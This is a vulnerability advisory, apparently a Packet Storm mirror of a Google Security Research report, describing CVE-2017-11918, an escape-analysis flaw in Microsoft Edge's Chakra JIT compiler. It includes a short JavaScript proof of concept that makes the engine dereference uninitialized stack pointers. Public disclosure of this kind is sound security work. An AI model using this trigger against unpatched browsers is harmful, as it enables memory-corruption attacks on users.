Microsoft Edge Chakra JIT Escape Analysis Bug

2018-01-10T00:00:00
ID PACKETSTORM:145787
Type packetstorm
Reporter Google Security Research
Modified 2018-01-10T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: JIT: Escape analysis bug   
  
CVE-2017-11918  
  
  
Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Escape_analysis</a>  
  
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.  
  
PoC:  
function opt() {  
let tmp = [];  
tmp[0] = tmp;  
return tmp[0];  
}  
  
function main() {  
for (let i = 0; i < 0x1000; i++) {  
opt();  
}  
  
print(opt()); // deref uninitialized stack pointers!  
}  
  
main();  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`